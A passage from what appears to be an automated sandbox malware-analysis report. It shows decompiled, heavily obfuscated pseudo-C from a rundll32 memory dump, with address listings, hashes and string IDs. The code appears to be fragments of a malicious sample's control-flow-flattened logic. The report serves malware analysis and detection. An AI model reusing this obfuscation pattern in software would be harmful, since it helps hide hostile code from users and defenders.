                                                                                                                                  				signed int _t529;
                                                                                                                                  				signed int _t530;
                                                                                                                                  				signed int _t531;
                                                                                                                                  				signed int _t532;
                                                                                                                                  				signed int _t533;
                                                                                                                                  				signed int _t534;
                                                                                                                                  				signed int _t535;
                                                                                                                                  				signed int _t536;
                                                                                                                                  				signed int _t537;
                                                                                                                                  				signed int _t538;
                                                                                                                                  				signed int _t539;
                                                                                                                                  				void* _t540;
                                                                                                                                  				void* _t546;
                                                                                                                                  				intOrPtr _t556;
                                                                                                                                  				void* _t603;
                                                                                                                                  				signed int _t605;
                                                                                                                                  				signed int* _t609;
                                                                                                                                  
                                                                                                                                  				_t609 =  &_v1748;
                                                                                                                                  				_v1648 = 0xded5e0;
                                                                                                                                  				_v1648 = _v1648 >> 0xb;
                                                                                                                                  				_v1648 = _v1648 | 0x3a1a97de;
                                                                                                                                  				_v1648 = _v1648 ^ 0x3a1a9ff7;
                                                                                                                                  				_v1608 = 0x6694ca;
                                                                                                                                  				_v1608 = _v1608 | 0xdc2b4f48;
                                                                                                                                  				_v1608 = _v1608 ^ 0x5c6fdfcb;
                                                                                                                                  				_v1712 = 0x53f825;
                                                                                                                                  				_v1712 = _v1712 >> 2;
                                                                                                                                  				_v1712 = _v1712 ^ 0x4e440c95;
                                                                                                                                  				_v1712 = _v1712 | 0x7235b0e7;
                                                                                                                                  				_v1712 = _v1712 ^ 0x7e75f2fd;
                                                                                                                                  				_v1632 = 0xc6d169;
                                                                                                                                  				_v1568 = 0;
                                                                                                                                  				_t603 = 0x9805d0a;
                                                                                                                                  				_t525 = 0x52;
                                                                                                                                  				_v1632 = _v1632 / _t525;
                                                                                                                                  				_t526 = 0x67;
                                                                                                                                  				_v1632 = _v1632 * 0x1e;
                                                                                                                                  				_v1632 = _v1632 ^ 0x0048bcfb;
                                                                                                                                  				_v1596 = 0x189afb;
                                                                                                                                  				_v1596 = _v1596 >> 0xe;
                                                                                                                                  				_v1596 = _v1596 ^ 0x000d7c1d;
                                                                                                                                  				_v1724 = 0x4bfed1;
                                                                                                                                  				_v1724 = _v1724 * 0x63;
                                                                                                                                  				_v1724 = _v1724 * 0x55;
                                                                                                                                  				_v1724 = _v1724 >> 1;
                                                                                                                                  				_v1724 = _v1724 ^ 0x61069d5d;
                                                                                                                                  				_v1580 = 0x401b2b;
                                                                                                                                  				_v1580 = _v1580 + 0x7090;
                                                                                                                                  				_v1580 = _v1580 ^ 0x00412b45;
                                                                                                                                  				_v1672 = 0xbaa782;
                                                                                                                                  				_v1672 = _v1672 / _t526;
                                                                                                                                  				_v1672 = _v1672 << 2;
                                                                                                                                  				_v1672 = _v1672 ^ 0x000e5528;
                                                                                                                                  				_v1624 = 0x1efbce;
                                                                                                                                  				_t527 = 0x4f;
                                                                                                                                  				_v1624 = _v1624 / _t527;
                                                                                                                                  				_v1624 = _v1624 ^ 0x000dc160;
                                                                                                                                  				_v1572 = 0x9ef416;
                                                                                                                                  				_t605 = 0x62;
                                                                                                                                  				_v1572 = _v1572 / _t605;
                                                                                                                                  				_v1572 = _v1572 ^ 0x00079814;
                                                                                                                                  				_v1612 = 0x4efe15;
                                                                                                                                  				_t528 = 0x43;
                                                                                                                                  				_v1612 = _v1612 / _t528;
                                                                                                                                  				_v1612 = _v1612 ^ 0x000e5446;
                                                                                                                                  				_v1640 = 0x94326d;
                                                                                                                                  				_t529 = 0x77;
                                                                                                                                  				_v1640 = _v1640 / _t529;
                                                                                                                                  				_t530 = 0x35;
                                                                                                                                  				_v1640 = _v1640 / _t530;
                                                                                                                                  				_v1640 = _v1640 ^ 0x000d83b8;
                                                                                                                                  				_v1676 = 0x511d41;
                                                                                                                                  				_t531 = 9;
                                                                                                                                  				_v1676 = _v1676 * 0x76;
                                                                                                                                  				_v1676 = _v1676 ^ 0xeef8e480;
                                                                                                                                  				_v1676 = _v1676 ^ 0xcb952f57;
                                                                                                                                  				_v1708 = 0x4e0a18;
                                                                                                                                  				_v1708 = _v1708 ^ 0x2110c6ad;
                                                                                                                                  				_v1708 = _v1708 | 0x4a7f48ac;
                                                                                                                                  				_v1708 = _v1708 + 0xffff2cb4;
                                                                                                                                  				_v1708 = _v1708 ^ 0x6b758b76;
                                                                                                                                  				_v1732 = 0x7a6741;
                                                                                                                                  				_t123 =  &_v1732; // 0x7a6741
                                                                                                                                  				_v1732 =  *_t123 / _t531;
                                                                                                                                  				_v1732 = _v1732 << 0xe;
                                                                                                                                  				_v1732 = _v1732 << 7;
                                                                                                                                  				_v1732 = _v1732 ^ 0x36245548;
                                                                                                                                  				_v1700 = 0x42788;
                                                                                                                                  				_t532 = 0x44;
                                                                                                                                  				_v1700 = _v1700 / _t532;
                                                                                                                                  				_v1700 = _v1700 | 0xce808109;
                                                                                                                                  				_v1700 = _v1700 + 0xffff7a0f;
                                                                                                                                  				_v1700 = _v1700 ^ 0xce88d2ed;
                                                                                                                                  				_v1740 = 0x39c25c;
                                                                                                                                  				_v1740 = _v1740 + 0xf71;
                                                                                                                                  				_t533 = 0x75;
                                                                                                                                  				_v1740 = _v1740 / _t533;
                                                                                                                                  				_v1740 = _v1740 ^ 0xc60840fd;
                                                                                                                                  				_v1740 = _v1740 ^ 0xc60d36f5;
                                                                                                                                  				_v1716 = 0x2bcc6c;
                                                                                                                                  				_v1716 = _v1716 + 0x97be;
                                                                                                                                  				_v1716 = _v1716 >> 0xd;
                                                                                                                                  				_v1716 = _v1716 ^ 0xcb020dbc;
                                                                                                                                  				_v1716 = _v1716 ^ 0xcb05808e;
                                                                                                                                  				_v1604 = 0x3f7ac0;
                                                                                                                                  				_v1604 = _v1604 + 0xafc6;
                                                                                                                                  				_v1604 = _v1604 ^ 0x0048c4ef;
                                                                                                                                  				_v1576 = 0x9f011d;
                                                                                                                                  				_v1576 = _v1576 ^ 0x8bb25c52;
                                                                                                                                  				_v1576 = _v1576 ^ 0x8b2a60ae;
                                                                                                                                  				_v1684 = 0xe4045e;
                                                                                                                                  				_v1684 = _v1684 * 0x42;
                                                                                                                                  				_v1684 = _v1684 * 0xc;
                                                                                                                                  				_v1684 = _v1684 ^ 0xc16ccb70;
                                                                                                                                  				_v1720 = 0x76be5;
                                                                                                                                  				_v1720 = _v1720 >> 0xd;
                                                                                                                                  				_v1720 = _v1720 * 0x3b;
                                                                                                                                  				_v1720 = _v1720 + 0xffffaa4e;
                                                                                                                                  				_v1720 = _v1720 ^ 0xfff1ea6d;
                                                                                                                                  				_v1680 = 0x1fb4c3;
                                                                                                                                  				_v1680 = _v1680 << 4;
                                                                                                                                  				_v1680 = _v1680 << 0xc;
                                                                                                                                  				_v1680 = _v1680 ^ 0xb4c6c556;
                                                                                                                                  				_v1644 = 0xb0dbcd;
                                                                                                                                  				_v1644 = _v1644 << 0xf;
                                                                                                                                  				_v1644 = _v1644 << 0x10;
                                                                                                                                  				_v1644 = _v1644 ^ 0x800a09c5;
                                                                                                                                  				_v1600 = 0x1a67e8;
                                                                                                                                  				_v1600 = _v1600 | 0xeb4b5744;
                                                                                                                                  				_v1600 = _v1600 ^ 0xeb54c7c0;
                                                                                                                                  				_v1652 = 0x1784b1;
                                                                                                                                  				_v1652 = _v1652 >> 0xf;
                                                                                                                                  				_v1652 = _v1652 << 6;
                                                                                                                                  				_v1652 = _v1652 ^ 0x00082079;
                                                                                                                                  				_v1660 = 0xec7770;
                                                                                                                                  				_v1660 = _v1660 + 0xb190;
                                                                                                                                  				_v1660 = _v1660 | 0x400c0cca;
                                                                                                                                  				_v1660 = _v1660 ^ 0x40ee2104;
                                                                                                                                  				_v1668 = 0xfc9259;
                                                                                                                                  				_v1668 = _v1668 + 0xffffc6b7;
                                                                                                                                  				_v1668 = _v1668 >> 0xe;
                                                                                                                                  				_v1668 = _v1668 ^ 0x000f272a;
                                                                                                                                  				_v1704 = 0xff7fae;
                                                                                                                                  				_v1704 = _v1704 + 0xffff711f;
                                                                                                                                  				_v1704 = _v1704 + 0xffff4b94;
                                                                                                                                  				_v1704 = _v1704 | 0x5a3393fe;
                                                                                                                                  				_v1704 = _v1704 ^ 0x5af53198;
                                                                                                                                  				_v1616 = 0x130067;
                                                                                                                                  				_t534 = 0x4e;
                                                                                                                                  				_v1616 = _v1616 / _t534;
                                                                                                                                  				_v1616 = _v1616 ^ 0x00057283;
                                                                                                                                  				_v1628 = 0x10552;
                                                                                                                                  				_v1628 = _v1628 + 0xf3cd;
                                                                                                                                  				_v1628 = _v1628 + 0x9e6e;
                                                                                                                                  				_v1628 = _v1628 ^ 0x00033ec8;
                                                                                                                                  				_v1636 = 0x95cc92;
                                                                                                                                  				_v1636 = _v1636 >> 0xf;
                                                                                                                                  				_v1636 = _v1636 + 0x9761;
                                                                                                                                  				_v1636 = _v1636 ^ 0x000e6713;
                                                                                                                                  				_v1748 = 0xd7b406;
                                                                                                                                  				_t535 = 0x31;
                                                                                                                                  				_v1748 = _v1748 * 0x46;
                                                                                                                                  				_v1748 = _v1748 << 1;
                                                                                                                                  				_v1748 = _v1748 + 0x479a;
                                                                                                                                  				_v1748 = _v1748 ^ 0x75ff50ef;
                                                                                                                                  				_v1584 = 0xe29275;
                                                                                                                                  				_v1584 = _v1584 * 0x6d;
                                                                                                                                  				_v1584 = _v1584 ^ 0x607f0d3c;
                                                                                                                                  				_v1664 = 0xc2b99a;
                                                                                                                                  				_v1664 = _v1664 / _t605;
                                                                                                                                  				_v1664 = _v1664 | 0xc7d1021c;
                                                                                                                                  				_v1664 = _v1664 ^ 0xc7dc1815;
                                                                                                                                  				_v1692 = 0xa5d2da;
                                                                                                                                  				_v1692 = _v1692 * 0x17;
                                                                                                                                  				_v1692 = _v1692 / _t535;
                                                                                                                                  				_t536 = 0x23;
                                                                                                                                  				_v1692 = _v1692 * 0x3a;
                                                                                                                                  				_v1692 = _v1692 ^ 0x11a891cb;
                                                                                                                                  				_v1656 = 0x680db3;
                                                                                                                                  				_v1656 = _v1656 >> 6;
                                                                                                                                  				_v1656 = _v1656 >> 5;
                                                                                                                                  				_v1656 = _v1656 ^ 0x000507e8;
                                                                                                                                  				_v1728 = 0x12970f;
                                                                                                                                  				_v1728 = _v1728 + 0xffffbe66;
                                                                                                                                  				_v1728 = _v1728 >> 6;
                                                                                                                                  				_v1728 = _v1728 / _t536;
                                                                                                                                  				_v1728 = _v1728 ^ 0x00053169;
                                                                                                                                  				_v1620 = 0xa87d1b;
                                                                                                                                  				_v1620 = _v1620 + 0xc3ba;
                                                                                                                                  				_v1620 = _v1620 ^ 0x00a7b1ac;
                                                                                                                                  				_v1736 = 0xb206b7;
                                                                                                                                  				_v1736 = _v1736 ^ 0x6f4eb888;
                                                                                                                                  				_t537 = 0x5d;
                                                                                                                                  				_v1736 = _v1736 / _t537;
                                                                                                                                  				_v1736 = _v1736 + 0x173b;
                                                                                                                                  				_v1736 = _v1736 ^ 0x013191a0;
                                                                                                                                  				_v1744 = 0xbf67a7;
                                                                                                                                  				_t538 = 0x70;
                                                                                                                                  				_v1744 = _v1744 / _t538;
                                                                                                                                  				_v1744 = _v1744 | 0x1279871b;
                                                                                                                                  				_v1744 = _v1744 ^ 0x04c3b9b8;
                                                                                                                                  				_v1744 = _v1744 ^ 0x16b0fef0;
                                                                                                                                  				_v1588 = 0x7bc48a;
                                                                                                                                  				_v1588 = _v1588 << 7;
                                                                                                                                  				_v1588 = _v1588 ^ 0x3de90636;
                                                                                                                                  				_v1688 = 0x5dc5eb;
                                                                                                                                  				_v1688 = _v1688 >> 0xb;
                                                                                                                                  				_v1688 = _v1688 + 0xaf87;
                                                                                                                                  				_t539 = 0x6c;
                                                                                                                                  				_t522 = _v1568;
                                                                                                                                  				_v1688 = _v1688 * 0x63;
                                                                                                                                  				_v1688 = _v1688 ^ 0x004fac27;
                                                                                                                                  				_v1696 = 0x311285;
                                                                                                                                  				_v1696 = _v1696 << 0xb;
                                                                                                                                  				_v1696 = _v1696 ^ 0x3061b352;
                                                                                                                                  				_v1696 = _v1696 / _t539;
                                                                                                                                  				_v1696 = _v1696 ^ 0x01b73771;
                                                                                                                                  				_v1592 = 0x977507;
                                                                                                                                  				_v1592 = _v1592 | 0xf9843f0d;
                                                                                                                                  				_v1592 = _v1592 ^ 0xf99a58c3;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t540 = 0x5c;
                                                                                                                                  					while(1) {
                                                                                                                                  						L2:
                                                                                                                                  						_t500 = 0x8167d85;
                                                                                                                                  						do {
                                                                                                                                  							L3:
                                                                                                                                  							if(_t603 == 0x2c7b186) {
                                                                                                                                  								E002D1FD1(_v1688, _v1696, _v1592, _v1564);
                                                                                                                                  								_t603 = 0xcf98960;
                                                                                                                                  								goto L18;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t603 == 0x33b45b1) {
                                                                                                                                  									_push(_v1680);
                                                                                                                                  									_push(_v1720);
                                                                                                                                  									_t502 = E002EDCF7(_v1684, 0x2d1080, __eflags);
                                                                                                                                  									_pop(_t546);
                                                                                                                                  									__eflags = E002DAAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
                                                                                                                                  									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
                                                                                                                                  									E002DA8B0(_v1628, _t502, _v1636);
                                                                                                                                  									_t609 =  &(_t609[0xf]);
                                                                                                                                  									L18:
                                                                                                                                  									_t500 = 0x8167d85;
                                                                                                                                  									_t540 = 0x5c;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t603 == _t500) {
                                                                                                                                  										_t509 = E002DF002(2 + E002DCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E002DCB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
                                                                                                                                  										_t609 =  &(_t609[0xd]);
                                                                                                                                  										__eflags = _t509;
                                                                                                                                  										_t603 = 0x2c7b186;
                                                                                                                                  										_v1568 = 0 | __eflags == 0x00000000;
                                                                                                                                  										goto L1;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t603 == 0x9805d0a) {
                                                                                                                                  											_push(_v1672);
                                                                                                                                  											_push(_v1648);
                                                                                                                                  											_push(_v1580);
                                                                                                                                  											_push( &_v520);
                                                                                                                                  											E002E46BB(_v1596, _v1724);
                                                                                                                                  											_t609 = _t609 - 0xc + 0x1c;
                                                                                                                                  											_t603 = 0xc81d40c;
                                                                                                                                  											while(1) {
                                                                                                                                  												L1:
                                                                                                                                  												_t540 = 0x5c;
                                                                                                                                  												goto L2;
                                                                                                                                  											}
                                                                                                                                  										} else {
                                                                                                                                  											if(_t603 == 0xaea35f7) {
                                                                                                                                  												_t523 =  *0x2f3e10; // 0x0
                                                                                                                                  												_t524 = _t523 + 0x1c;
                                                                                                                                  												while(1) {
                                                                                                                                  													__eflags =  *_t524 - _t540;
                                                                                                                                  													if(__eflags == 0) {
                                                                                                                                  														break;
                                                                                                                                  													}
                                                                                                                                  													_t524 = _t524 + 2;
                                                                                                                                  													__eflags = _t524;
                                                                                                                                  												}
                                                                                                                                  												_t522 = _t524 + 2;
                                                                                                                                  												_t603 = 0x33b45b1;
                                                                                                                                  												goto L2;
                                                                                                                                  											} else {
                                                                                                                                  												_t618 = _t603 - 0xc81d40c;
                                                                                                                                  												if(_t603 == 0xc81d40c) {
                                                                                                                                  													_push(_v1612);
                                                                                                                                  													_push(_v1572);
                                                                                                                                  													_t513 = E002EDCF7(_v1624, 0x2d1020, _t618);
                                                                                                                                  													E002E176B( &_v1040, _t618);
                                                                                                                                  													_t556 =  *0x2f3e10; // 0x0
                                                                                                                                  													_t403 = _t556 + 0x1c; // 0x1c
                                                                                                                                  													_t404 = _t556 + 0x23c; // 0x23c
                                                                                                                                  													E002E1652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
                                                                                                                                  													E002DA8B0(_v1604, _t513, _v1576);
                                                                                                                                  													_t609 =  &(_t609[0xf]);
                                                                                                                                  													_t603 = 0xaea35f7;
                                                                                                                                  													while(1) {
                                                                                                                                  														L1:
                                                                                                                                  														_t540 = 0x5c;
                                                                                                                                  														L2:
                                                                                                                                  														_t500 = 0x8167d85;
                                                                                                                                  														goto L3;
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t603 - 0xcf98960;
                                                                                                                                  						} while (__eflags != 0);
                                                                                                                                  						return _v1568;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  0x002f0530
                                                                                                                                  0x002f0533
                                                                                                                                  0x002f0537
                                                                                                                                  0x002f053b
                                                                                                                                  0x002f0543
                                                                                                                                  0x002f054b
                                                                                                                                  0x002f055e
                                                                                                                                  0x002f0565
                                                                                                                                  0x002f0570
                                                                                                                                  0x002f0580
                                                                                                                                  0x002f0584
                                                                                                                                  0x002f058c
                                                                                                                                  0x002f0594
                                                                                                                                  0x002f05a1
                                                                                                                                  0x002f05ad
                                                                                                                                  0x002f05b6
                                                                                                                                  0x002f05b7
                                                                                                                                  0x002f05bb
                                                                                                                                  0x002f05c3
                                                                                                                                  0x002f05cb
                                                                                                                                  0x002f05d0
                                                                                                                                  0x002f05d5
                                                                                                                                  0x002f05dd
                                                                                                                                  0x002f05e5
                                                                                                                                  0x002f05ed
                                                                                                                                  0x002f05f8
                                                                                                                                  0x002f05fc
                                                                                                                                  0x002f0604
                                                                                                                                  0x002f060f
                                                                                                                                  0x002f061a
                                                                                                                                  0x002f0625
                                                                                                                                  0x002f062d
                                                                                                                                  0x002f0642
                                                                                                                                  0x002f0647
                                                                                                                                  0x002f064d
                                                                                                                                  0x002f0655
                                                                                                                                  0x002f065d
                                                                                                                                  0x002f0669
                                                                                                                                  0x002f066e
                                                                                                                                  0x002f0674
                                                                                                                                  0x002f067c
                                                                                                                                  0x002f0684
                                                                                                                                  0x002f068c
                                                                                                                                  0x002f0697
                                                                                                                                  0x002f069f
                                                                                                                                  0x002f06aa
                                                                                                                                  0x002f06b2
                                                                                                                                  0x002f06b7
                                                                                                                                  0x002f06c4
                                                                                                                                  0x002f06c5
                                                                                                                                  0x002f06cc
                                                                                                                                  0x002f06d0
                                                                                                                                  0x002f06d8
                                                                                                                                  0x002f06e0
                                                                                                                                  0x002f06e5
                                                                                                                                  0x002f06f3
                                                                                                                                  0x002f06f7
                                                                                                                                  0x002f06ff
                                                                                                                                  0x002f070a
                                                                                                                                  0x002f0715
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0722
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0728
                                                                                                                                  0x002f0728
                                                                                                                                  0x002f072e
                                                                                                                                  0x002f098a
                                                                                                                                  0x002f0991
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0734
                                                                                                                                  0x002f073a
                                                                                                                                  0x002f08ea
                                                                                                                                  0x002f08f3
                                                                                                                                  0x002f08fb
                                                                                                                                  0x002f0901
                                                                                                                                  0x002f095c
                                                                                                                                  0x002f0967
                                                                                                                                  0x002f096a
                                                                                                                                  0x002f096f
                                                                                                                                  0x002f0993
                                                                                                                                  0x002f0995
                                                                                                                                  0x002f099a
                                                                                                                                  0x002f0740
                                                                                                                                  0x002f0742
                                                                                                                                  0x002f08ca
                                                                                                                                  0x002f08d1
                                                                                                                                  0x002f08d4
                                                                                                                                  0x002f08d6
                                                                                                                                  0x002f08de
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0748
                                                                                                                                  0x002f074e
                                                                                                                                  0x002f0831
                                                                                                                                  0x002f083c
                                                                                                                                  0x002f0840
                                                                                                                                  0x002f0855
                                                                                                                                  0x002f0856
                                                                                                                                  0x002f085b
                                                                                                                                  0x002f085e
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0722
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0722
                                                                                                                                  0x002f0754
                                                                                                                                  0x002f075a
                                                                                                                                  0x002f0811
                                                                                                                                  0x002f0817
                                                                                                                                  0x002f081f
                                                                                                                                  0x002f081f
                                                                                                                                  0x002f0822
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002f081c
                                                                                                                                  0x002f081c
                                                                                                                                  0x002f081c
                                                                                                                                  0x002f0824
                                                                                                                                  0x002f0827
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0760
                                                                                                                                  0x002f0760
                                                                                                                                  0x002f0766
                                                                                                                                  0x002f076c
                                                                                                                                  0x002f0778
                                                                                                                                  0x002f0786
                                                                                                                                  0x002f0794
                                                                                                                                  0x002f07cb
                                                                                                                                  0x002f07d8
                                                                                                                                  0x002f07dc
                                                                                                                                  0x002f07ea
                                                                                                                                  0x002f07ff
                                                                                                                                  0x002f0804
                                                                                                                                  0x002f0807
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0722
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0723
                                                                                                                                  0x00000000
                                                                                                                                  0x002f0723
                                                                                                                                  0x002f0720
                                                                                                                                  0x002f0766
                                                                                                                                  0x002f075a
                                                                                                                                  0x002f074e
                                                                                                                                  0x002f0742
                                                                                                                                  0x002f073a
                                                                                                                                  0x002f099b
                                                                                                                                  0x002f099b
                                                                                                                                  0x002f09b4
                                                                                                                                  0x002f09b4
                                                                                                                                  0x002f0723

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Agz$DWK$E+A$g$pw
                                                                                                                                  • API String ID: 0-1474679353
                                                                                                                                  • Opcode ID: e19684cd700c23a53156fafab9a269d0b6ae1f2e75af4686c5b76aaa0ae90852
                                                                                                                                  • Instruction ID: 1566f525b8cd1bd1647ae5b6587b116d744efae2c7eb4253de73acac3f411042
                                                                                                                                  • Opcode Fuzzy Hash: e19684cd700c23a53156fafab9a269d0b6ae1f2e75af4686c5b76aaa0ae90852
                                                                                                                                  • Instruction Fuzzy Hash: 4D32137150C3808FD368CF25C98AA9BFBF2BBC4748F10891DE29986261D7B59959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002DF09B(void* __ecx) {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				char _v1560;
                                                                                                                                  				char _v2080;
                                                                                                                                  				char _v2600;
                                                                                                                                  				signed int _v2604;
                                                                                                                                  				signed int _v2608;
                                                                                                                                  				signed int _v2612;
                                                                                                                                  				signed int _v2616;
                                                                                                                                  				signed int _v2620;
                                                                                                                                  				signed int _v2624;
                                                                                                                                  				signed int _v2628;
                                                                                                                                  				signed int _v2632;
                                                                                                                                  				signed int _v2636;
                                                                                                                                  				signed int _v2640;
                                                                                                                                  				signed int _v2644;
                                                                                                                                  				signed int _v2648;
                                                                                                                                  				signed int _v2652;
                                                                                                                                  				signed int _v2656;
                                                                                                                                  				signed int _v2660;
                                                                                                                                  				signed int _v2664;
                                                                                                                                  				signed int _v2668;
                                                                                                                                  				signed int _v2672;
                                                                                                                                  				signed int _v2676;
                                                                                                                                  				signed int _v2680;
                                                                                                                                  				signed int _v2684;
                                                                                                                                  				signed int _v2688;
                                                                                                                                  				signed int _v2692;
                                                                                                                                  				signed int _v2696;
                                                                                                                                  				signed int _v2700;
                                                                                                                                  				signed int _v2704;
                                                                                                                                  				signed int _v2708;
                                                                                                                                  				signed int _v2712;
                                                                                                                                  				signed int _v2716;
                                                                                                                                  				signed int _v2720;
                                                                                                                                  				signed int _v2724;
                                                                                                                                  				signed int _v2728;
                                                                                                                                  				signed int _v2732;
                                                                                                                                  				signed int _v2736;
                                                                                                                                  				signed int _v2740;
                                                                                                                                  				signed int _v2744;
                                                                                                                                  				signed int _v2748;
                                                                                                                                  				signed int _v2752;
                                                                                                                                  				signed int _v2756;
                                                                                                                                  				signed int _v2760;
                                                                                                                                  				signed int _v2764;
                                                                                                                                  				signed int _v2768;
                                                                                                                                  				signed int _v2772;
                                                                                                                                  				signed int _t425;
                                                                                                                                  				signed int _t443;
                                                                                                                                  				signed int _t444;
                                                                                                                                  				signed int _t445;
                                                                                                                                  				signed int _t446;
                                                                                                                                  				signed int _t447;
                                                                                                                                  				signed int _t448;
                                                                                                                                  				signed int _t449;
                                                                                                                                  				signed int _t450;
                                                                                                                                  				signed int _t451;
                                                                                                                                  				signed int _t452;
                                                                                                                                  				signed int _t453;
                                                                                                                                  				signed int _t458;
                                                                                                                                  				void* _t502;
                                                                                                                                  				void* _t503;
                                                                                                                                  				signed int* _t507;
                                                                                                                                  
                                                                                                                                  				_t507 =  &_v2772;
                                                                                                                                  				_v2628 = 0x98f0ce;
                                                                                                                                  				_v2628 = _v2628 >> 0xb;
                                                                                                                                  				_v2628 = _v2628 ^ 0x00001337;
                                                                                                                                  				_v2696 = 0x96ddc1;
                                                                                                                                  				_v2696 = _v2696 + 0xffff0eed;
                                                                                                                                  				_v2696 = _v2696 + 0xffffc9f2;
                                                                                                                                  				_v2696 = _v2696 ^ 0x009155bb;
                                                                                                                                  				_v2748 = 0x5205ca;
                                                                                                                                  				_v2748 = _v2748 ^ 0x19402ba5;
                                                                                                                                  				_t502 = __ecx;
                                                                                                                                  				_t503 = 0xea1969c;
                                                                                                                                  				_t443 = 0x43;
                                                                                                                                  				_v2748 = _v2748 / _t443;
                                                                                                                                  				_t444 = 0xb;
                                                                                                                                  				_v2748 = _v2748 / _t444;
                                                                                                                                  				_v2748 = _v2748 ^ 0x000a2456;
                                                                                                                                  				_v2604 = 0x2f1706;
                                                                                                                                  				_t445 = 0x26;
                                                                                                                                  				_v2604 = _v2604 * 6;
                                                                                                                                  				_v2604 = _v2604 ^ 0x011fcdd9;
                                                                                                                                  				_v2684 = 0x108800;
                                                                                                                                  				_v2684 = _v2684 >> 0xc;
                                                                                                                                  				_v2684 = _v2684 / _t445;
                                                                                                                                  				_v2684 = _v2684 ^ 0x00056909;
                                                                                                                                  				_v2764 = 0x56ac6f;
                                                                                                                                  				_v2764 = _v2764 << 0xe;
                                                                                                                                  				_v2764 = _v2764 | 0x24a96f4c;
                                                                                                                                  				_t446 = 0x42;
                                                                                                                                  				_v2764 = _v2764 / _t446;
                                                                                                                                  				_v2764 = _v2764 ^ 0x02abe6d6;
                                                                                                                                  				_v2680 = 0xb60c61;
                                                                                                                                  				_t447 = 0x16;
                                                                                                                                  				_v2680 = _v2680 / _t447;
                                                                                                                                  				_v2680 = _v2680 << 7;
                                                                                                                                  				_v2680 = _v2680 ^ 0x04229d93;
                                                                                                                                  				_v2712 = 0x6d1dcd;
                                                                                                                                  				_v2712 = _v2712 | 0x18b294c6;
                                                                                                                                  				_v2712 = _v2712 ^ 0xf88c4d23;
                                                                                                                                  				_v2712 = _v2712 ^ 0xe07332c4;
                                                                                                                                  				_v2612 = 0x9fb2e7;
                                                                                                                                  				_v2612 = _v2612 | 0xd190ff6b;
                                                                                                                                  				_v2612 = _v2612 ^ 0xd1908c6f;
                                                                                                                                  				_v2732 = 0x85d89e;
                                                                                                                                  				_v2732 = _v2732 << 5;
                                                                                                                                  				_v2732 = _v2732 >> 0xd;
                                                                                                                                  				_t448 = 0x37;
                                                                                                                                  				_v2732 = _v2732 / _t448;
                                                                                                                                  				_v2732 = _v2732 ^ 0x0009f3db;
                                                                                                                                  				_v2704 = 0x8a2dac;
                                                                                                                                  				_v2704 = _v2704 << 0xd;
                                                                                                                                  				_v2704 = _v2704 * 6;
                                                                                                                                  				_v2704 = _v2704 ^ 0xa2425f92;
                                                                                                                                  				_v2620 = 0x8530c4;
                                                                                                                                  				_v2620 = _v2620 | 0x7f36b61d;
                                                                                                                                  				_v2620 = _v2620 ^ 0x7fb2adaf;
                                                                                                                                  				_v2756 = 0xf61f4c;
                                                                                                                                  				_v2756 = _v2756 >> 0xe;
                                                                                                                                  				_t449 = 0x4b;
                                                                                                                                  				_v2756 = _v2756 / _t449;
                                                                                                                                  				_v2756 = _v2756 + 0xffffd188;
                                                                                                                                  				_v2756 = _v2756 ^ 0xfff88f11;
                                                                                                                                  				_v2660 = 0x7ee31b;
                                                                                                                                  				_v2660 = _v2660 | 0xd8d04f1e;
                                                                                                                                  				_v2660 = _v2660 ^ 0xd8ffeb88;
                                                                                                                                  				_v2672 = 0xc71ff5;
                                                                                                                                  				_v2672 = _v2672 >> 0xf;
                                                                                                                                  				_v2672 = _v2672 ^ 0x000b63b3;
                                                                                                                                  				_v2740 = 0x49f4c1;
                                                                                                                                  				_t450 = 0x76;
                                                                                                                                  				_v2740 = _v2740 * 0x4b;
                                                                                                                                  				_v2740 = _v2740 + 0xffff254a;
                                                                                                                                  				_v2740 = _v2740 * 0x48;
                                                                                                                                  				_v2740 = _v2740 ^ 0x17c5e1bd;
                                                                                                                                  				_v2652 = 0x2197ca;
